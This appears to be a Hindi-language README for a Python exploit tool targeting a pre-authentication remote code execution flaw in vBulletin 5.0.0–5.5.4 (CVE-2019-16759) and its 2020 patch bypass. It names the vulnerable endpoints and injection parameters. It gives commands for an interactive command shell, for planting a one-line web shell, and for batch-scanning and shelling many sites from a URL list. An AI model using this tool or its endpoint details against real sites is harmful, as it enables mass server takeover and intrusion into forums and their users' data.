
CVE-2019-16759 vbulletin 5.0.0 से 5.5.4 तक प्री-ऑथ RCE
201909 में vBulletin 5 (5.0.0-5.5.4) में RCE दोष (CVE-2019-16759) सामने आया। फ़ाइल ajax/render/widget_php और POST पैरामीटर widgetConfig[code] का उपयोग करके सीधे रिमोट कोड निष्पादन किया जा सकता है।
20200811 को, इंटरनेट पर खबर आई कि CVE-2019-16759 के पैच को बायपास किया जा सकता है। ajax/render/widget_tabbedcontainer_tab_panel और POST पैरामीटर subWidgets[0][config][code] का उपयोग करके सीधे रिमोट कोड निष्पादन किया जा सकता है।
यह उपकरण एकल URL जाँच, cmdshell, वेब शेल प्राप्त करना (एक-लाइन वेब शेल लिखना), बैच जाँच और बैच शेल प्राप्त करना का समर्थन करता है।
python2.7
pip install requests
सहायता का उपयोग करें: python vbulletin5-rce.py -h

एकल URL दोष जाँच: python vbulletin5-rce.py -u "http://www.xxx.com/"


cmdshell: python vbulletin5-rce.py -u "http://www.xxx.com/" --cmdshell


एकल URL शेल प्राप्त करना: python vbulletin5-rce.py -u "http://www.xxx.com/" --getshell


बैच जाँच: python vbulletin5-rce.py -f urls.txt

बैच शेल प्राप्त करना: python vbulletin5-rce.py -f urls.txt --getshell

gmail:[email protected]